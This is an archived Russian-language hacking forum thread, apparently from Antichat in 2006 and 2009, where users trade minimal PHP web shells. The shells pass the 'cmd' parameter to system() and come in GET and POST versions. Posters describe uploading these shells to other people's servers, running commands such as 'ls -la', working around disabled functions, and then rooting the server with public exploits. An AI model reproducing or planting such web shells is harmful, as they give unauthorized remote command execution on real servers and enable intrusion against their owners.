Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   ИНТЕРЕСНО...шелл на php (https://forum.antichat.xyz/showthread.php?t=20370)

Ch3ck 10.06.2006 18:07
ИНТЕРЕСНО...шелл на php
 
Модерам: Извините, если я запостил данную тему не в этом разделе..., просто не знаю к чему её отнести...если, что перенесите.

Вот выношу на обсуждение интересную весчъ...
Частенько заливая самописный шелл на типа вот этого:
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>"
?> и обращаясь к нему по типу вот этого: _http://someserver.com/shell.php я получал ошибку,что мол
Warning!!! ла-ла ... функция system запрещена...
Но всё равно обратившись по ссылке _http://someserver.com/shell.php?cmd=ls -la получил листинг данной директори... и это был не единственный случай!!!
Мораль сей басни: сперва попробуйте выполнить команду, чем сразу к другим действиям...

NaX[no]rT 10.06.2006 18:21
Цитата:
думаю это не листинг, даже не includ,
А что же это, что за явление?))
Глупая тема, если хватило ума залить шелл, то тем более хватит проверить, что бы там не писалось.
Фтопку!

k1b0rg 10.06.2006 18:31
когда ты обращаешься по адрессу
http://someserver.com/shell.php
то ошибка происходит в строке
system($_GET['cmd']);
так как не определен параметр cmd
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.

Ch3ck 10.06.2006 18:32
Я конечно, не чего не хочу сказать, но сколько я видео не смотрел, когда заливают шелл, и вылетает такая муйня, то сразу переходят к другим методам...

k1b0rg 10.06.2006 18:50
переходят к другим методам, когда она действительна отключена.
а по твоему первому посту, этого не видно.

shiz 10.06.2006 20:06
Цитата:
Сообщение от k1b0rg
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.
ошибка будет, просто об этом не будет сообщения..
хотя чего эт я придираюсь, суть то одна)

max_pain89 10.06.2006 21:19
юзаем
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>
а лучше вообще пост, но это в идеале

shiz 10.06.2006 22:27
а ещё добавим прелести, что б потом люди не пужалися, что чёт не работает... если конешн не для себя пишем ;)

<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

else {
echo 'не введены данные запроса';
exit;
}

?>

Ch3ck 10.06.2006 22:57
не спорю...
хотя на мой взгляд удобнее чем этот простого шелла нет...
<form method=post>
<input type=text name=cmd size=50>
<input type=submit value="Жми на пимпу">
</form>
<?php
echo "<pre>";
system(cmd);
echo "</pre>";
?> ....

shiz 10.06.2006 23:00
так это через post
а я оставил вариант через get
)
эдак мы сейчас для удобства такого понапишем... ещё одинr57shell ;)

nc.STRIEM 10.06.2006 23:31
а чем ваше отличаеться system($_GET['cmd']); от system($cmd); прост скок смотрю каждый пишет по своему! а разница ваше какая?

k1b0rg 10.06.2006 23:45
первый будет работать и вызываться в любом месте, а второй может потеряться в функциях и т.д.

если у тебя шелл <? system(); ?> то тут пох как использовать

nc.STRIEM 11.06.2006 00:03
k1b0rg спасиб за справку!

TRX.new 03.05.2009 17:00
а что делать если эти шеллы не выполняют команды nix ? в apache включен safe_mode и запрещены команды выполнения cmd (system() и тд)

m0Hze 03.05.2009 18:25
Просто залить обычнй шелл,и посмотреть что там в дирах,если есть возможность,то рутать его.Милворм в помосчь


Время: 09:17